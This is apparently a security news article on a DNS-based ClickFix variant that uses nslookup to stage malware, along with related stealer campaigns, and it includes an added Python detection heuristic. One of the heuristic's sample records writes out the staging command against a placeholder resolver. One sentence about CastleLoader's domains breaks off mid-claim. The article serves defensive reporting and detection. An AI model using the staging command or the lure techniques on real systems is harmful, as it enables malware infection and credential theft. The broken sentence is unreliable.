Microsoft exposes DNS-based ClickFix attack using Nslookup to stage malware

By user, February 15, 2026

Microsoft has revealed details of a new version of the ClickFix social engineering tactic in which attackers trick unsuspecting users into running a command that performs a Domain Name System (DNS) lookup to retrieve the next-stage payload.

Specifically, this attack uses the “nslookup” (short for name server lookup) command to perform a custom DNS lookup that is triggered via the Windows Run dialog.

ClickFix is an increasingly popular technique traditionally delivered via phishing, malvertising, or drive-by download schemes. It typically redirects the target to a fake landing page that hosts a fake CAPTCHA verification or instructions to address an issue that does not exist on the computer, and that “fix” consists of executing a command through the Windows Run dialog or the macOS Terminal app.

This attack method has become popular over the past two years because it relies on victims infecting their own machines with malware, which lets attackers bypass security controls. ClickFix has been so effective that it has spawned several variants, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

“In modern DNS-based staging with ClickFix, the first command is executed via cmd.exe and performs a DNS lookup against a hard-coded external DNS server rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the ‘Name:’ DNS response, which is then executed as the second stage payload.”

Microsoft says this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel” that allows threat actors to reach the infrastructure they control, as well as build a new layer of validation before executing second-stage payloads.

“Using DNS in this manner reduces reliance on traditional web requests and allows malicious activity to be mixed in with normal network traffic,” the Windows maker added.

The retrieved payload then kicks off an attack chain that downloads a ZIP archive from an external server (azwsappdev[.]com) and executes it to perform reconnaissance, run detection commands, and drop a Visual Basic Script (VBScript) that launches ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.

To establish persistence, a Windows shortcut (LNK) file pointing to the VBScript is created in the Windows Startup folder so that the malware is launched automatically each time the operating system starts.
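Microsoft’s description of the staging step, distilled into a detection heuristic as an added example (this is not Microsoft’s own rule or code): it scores constructed Sysmon-style process-creation records for the traits the team describes (nslookup, a hard-coded external resolver, a filter on the ‘Name:’ field) plus an assumed parent-process trait for the Run dialog. The internal network ranges, the threshold and the sample records are assumptions.

```python
"""Heuristic detector for DNS-based ClickFix staging (added example, not Microsoft's code).
Scores constructed Sysmon-style process records for the traits the article describes."""
import ipaddress
import re

# Assumption: resolvers outside these ranges are "external"; 203.0.113.0/24 (TEST-NET-3) stands in for a real one.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
NAME_FILTER = re.compile(r"\b(findstr|find)\b.*name:")

def is_external(lit: str) -> bool:
    """True for a parseable IPv4 literal outside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(lit)
    except ValueError:  # e.g. 999.1.1.1 is not an address
        return False
    return not any(addr in net for net in INTERNAL_NETS)

def external_resolvers(cmdline: str) -> list[str]:
    """IPv4 literals on the command line that look like external DNS servers."""
    return [lit for lit in IPV4.findall(cmdline) if is_external(lit)]

def score_record(rec: dict) -> tuple[int, list[str]]:
    """Count independent indicators; each alone is common, together they are not."""
    low = rec["CommandLine"].lower()
    reasons = []
    if "nslookup" in low:
        reasons.append("nslookup in command line")
    if external_resolvers(low):
        reasons.append("explicit external DNS server passed to nslookup")
    if NAME_FILTER.search(low):
        reasons.append("output filtered for the 'Name:' response field")
    if rec["ParentImage"].lower().endswith("explorer.exe") and rec["Image"].lower().endswith("cmd.exe"):
        reasons.append("cmd.exe spawned by explorer.exe (consistent with the Run dialog)")
    return len(reasons), reasons

def flag_records(records: list[dict], threshold: int = 3) -> list[dict]:
    """Records meeting the threshold; 3 of 4 traits avoids firing on routine nslookup use."""
    return [r for r in records if score_record(r)[0] >= threshold]

# Constructed sample records: the first mimics the staging step, the others are benign.
SAMPLE_RECORDS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c nslookup stage.example.invalid 203.0.113.5 | findstr Name:"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup intranet.corp.example 10.0.0.53"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
]
```

Running `flag_records(SAMPLE_RECORDS)` returns only the first record; tune `INTERNAL_NETS` to the resolvers your environment actually uses before deploying anything like this.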

The disclosure comes as Bitdefender warns of a spike in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns deploying an AutoIt version of CastleLoader, a malware loader associated with a threat actor codenamed GrayBravo (formerly TAG-150).

CastleLoader has built-in checks to verify the presence of virtualization software and certain security programs before decrypting and launching stealer malware in memory. Outside of ClickFix, websites promoting cracked software and pirated movies serve as bait for CastleLoader-based attack chains, tricking users into downloading malicious installers and executable files disguised as MP4 media files.

Other CastleLoader campaigns used websites promising cracked software downloads as a springboard to distribute fake NSIS installers that also ran obfuscated VBA scripts before executing an AutoIt script to load Lumma Stealer. The VBA loader is designed to create scheduled tasks that ensure persistence.

“Despite extensive law enforcement sabotage in 2025, Lumma Stealer’s operations continued and demonstrated resilience by quickly migrating to a new hosting provider and adapting alternative loaders and delivery techniques,” the Romanian cybersecurity firm said. “At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through the distribution chain.”

Interestingly, one of the domains in CastleLoader’s infrastructure (testdomain123123[.]…). This indicates that the operators of the two malware families are working together or sharing a service provider. The majority of Lumma Stealer infections have been recorded in India, followed by France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

“ClickFix’s effectiveness lies in its exploitation of procedural reliability, not technical vulnerabilities,” Bitdefender said. “The instructions resemble troubleshooting steps and validation workarounds that users may have encountered before. As a result, victims are often unaware that they are manually running arbitrary code on their systems.”

CastleLoader is not the only loader used to distribute Lumma Stealer. Campaigns observed as early as March 2025 utilized another loader called RenEngine Loader, which spread malware under the guise of game cheats and pirated software such as the CorelDRAW graphics editor. In these attacks, the loader deploys Lumma Stealer via a secondary loader named Hijack Loader.

According to Kaspersky data, the RenEngine Loader attack has primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.

This development coincides with the emergence of several campaigns that use social engineering lures such as ClickFix to deliver a range of stealers and malware loaders:

  • A macOS campaign that uses phishing and malvertising to deliver Odyssey Stealer, a rebrand of Poseidon Stealer, which is itself a fork of Atomic macOS Stealer (AMOS). The stealer harvests credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft. “Beyond credential theft, Odyssey operates as a complete remote access Trojan,” Censys said. “The persistent LaunchDaemon polls the C2 every 60 seconds for commands and supports SOCKS5 proxies for arbitrary shell execution, reinfection, and tunneling traffic through the victim machine.”
  • A ClickFix attack chain targeting Windows systems that uses a fake CAPTCHA verification page on a legitimate website to trick users into running a PowerShell command that deploys the StealC information stealer.
  • An email phishing campaign that uses a malicious SVG file inside a password-protected ZIP archive to instruct victims to run PowerShell commands via ClickFix, ultimately deploying an open source .NET infostealer called Stealerium.
  • Campaigns deploying Atomic Stealer and MacSync Stealer by abusing the public sharing features of generative artificial intelligence (AI) services such as Anthropic Claude to stage malicious ClickFix instructions for performing various tasks on macOS (such as an “online DNS resolver”), and distributing those links through sponsored results in search engines such as Google.
  • A campaign that redirects users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s support team, tricking them into executing ClickFix instructions that deliver the next-stage stealer payload from an external server, raxelpak[.]com. “The URL history of C2 domain raxelpak[.]com dated back to 2021 and appeared to host an e-commerce site for safety workwear,” MacPaw’s Moonlock Lab said, adding, “We do not know if the domain was hijacked or simply expired and re-registered [by the threat actor]. It’s not clear, but it fits into a broader pattern of leveraging old domains with existing reputations to evade detection.”
  • A variation of the same campaign, which installs Homebrew and steps through ClickFix instructions to install stealer malware, promoted through sponsored search results for links associated with Claude and Evernote. The ad “advertises a genuine, recognized domain (claude.ai), rather than a spoofed or typosquatted site. Clicking on the ad will take you to a genuine, crooked page,” AdGuard said of the phishing copy. The result is clear: Google Ads + a well-known and trusted platform + technology users with significant downstream impact = powerful malware distribution vector.
  • A macOS email phishing campaign that prompts recipients to download and run an AppleScript file to address supposed compatibility issues, which in turn introduces another AppleScript designed to steal credentials and fetch additional JavaScript payloads. The malware does not grant permissions to itself. “Instead, it forges the TCC authentication of trusted Apple-signed binaries (terminal, osascript, script editor, and bash) and performs malicious actions through these binaries, inheriting their privileges,” Darktrace said.
  • ClearFake campaigns that use fake CAPTCHAs on compromised WordPress sites to trigger the execution of HTML Application (HTA) files and deploy Lumma Stealer. This campaign uses a malicious JavaScript injection, a technique known as EtherHiding, to invoke a contract hosted on the BNB Smart Chain and retrieve an unknown payload hosted on GitHub. EtherHiding offers attackers several advantages, making the campaign more resilient to takedown efforts because the blockchain is immutable and decentralized.

A recent analysis published by Flare found that threat actors are increasingly targeting Apple macOS using information stealers and sophisticated tooling.

“Nearly all macOS thieves prioritize stealing cryptocurrencies above all else,” the company said. “This laser focus reflects an economic reality: Cryptocurrency users disproportionately use Macs, which often hold significant value in software wallets. Unlike bank accounts, cryptocurrency transactions are irreversible. Once a seed phrase is compromised, funds are irretrievably gone forever.”

“The assumption that ‘Macs are virus-free’ is not only outdated, it’s actually dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs, such as unsigned applications requesting passwords, anomalous terminal activity, connections to blockchain nodes for non-financial purposes, and data leakage patterns targeting keychain or browser storage.”
